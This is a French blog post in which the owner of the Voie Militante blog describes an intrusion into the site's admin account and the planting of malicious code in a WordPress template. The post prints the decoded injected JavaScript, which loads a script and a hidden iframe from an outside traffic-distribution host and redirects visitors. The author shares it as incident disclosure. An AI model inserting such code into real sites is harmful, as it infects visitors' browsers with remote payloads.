Une 2e attaque sur Voie Militante en 6 mois !

Samedi matin, aux alentours de 11 h 00, je reçois un coup de téléphone à mon domicile de l’un de mes fidèles lecteurs. Il me dit qu’Avast lui a signalé un Trojan sur la page principale du blog Voie Militante.

Hélas, étant sous Linux, je n’ai aucun moyen de vérifier que le contenu d’une page visitée est infecté. Et pourtant, le bougre, il disait juste. Confirmation par mail vers 14 h 00 d’un autre lecteur.

Je cherche dans la page et je tombe là-dessus. Le code présenté ci-dessous a dû faire l’objet d’un décodage de ma part ayant nécessité près d’une heure d’acharnement.

<script>
document.write( « <script src=\  » « + « http://itsallbreaksoft.net/tds/in.cgi?2&seoref= « +encodeURIComponent(document.referrer)+ « &parameter=$keyword&se=$se&ur=1&HTTP_REFERER= « + encodeURIComponent(document.URL)+ « &default_keyword=notdefine « + « \ « ><\/script> « );
</script>
<script>
if(typeof(h)== « undefined « )
{
document.write( « <iframe src=’http://itsallbreaksoft.net/tds/in.cgi?3&seoref= « +encodeURIComponent(document.referrer)+ « &parameter=$keyword&se=$se&ur=1&HTTP_REFERER= « + encodeURIComponent(document.URL)+ « &default_keyword=notdefine’ width=1 height=1 border=0 frameborder=0></iframe> « );
}
else if(h.indexOf( « http: « )==0)
{
window.location=h;
}
</script>

L’injection s’est faite par une connexion à l’interface d’admin en 1 seule tentative, signe que l’assaillant était en possession d’un des mots de passe de Voie Militante. Il a déposé le code malicieux dans la page header.php du template que nous utilisons. Or, nous sommes deux à posséder un compte d’administration.

L’adresse ip de la machine concernée est 203.211.135.160 dont le nom est x7.yishun.sg ! Aucun élément sur son propriétaire.

J’ai évidemment communiqué tous les éléments en ma possession à un service de police spécialisé. Deux attaques en moins de six mois.

Attaque précédente : Faille WordPress et hack d’un de mes blogs

Blogosphère  / Javascript Sécurité informatique Voie Militante Wordpress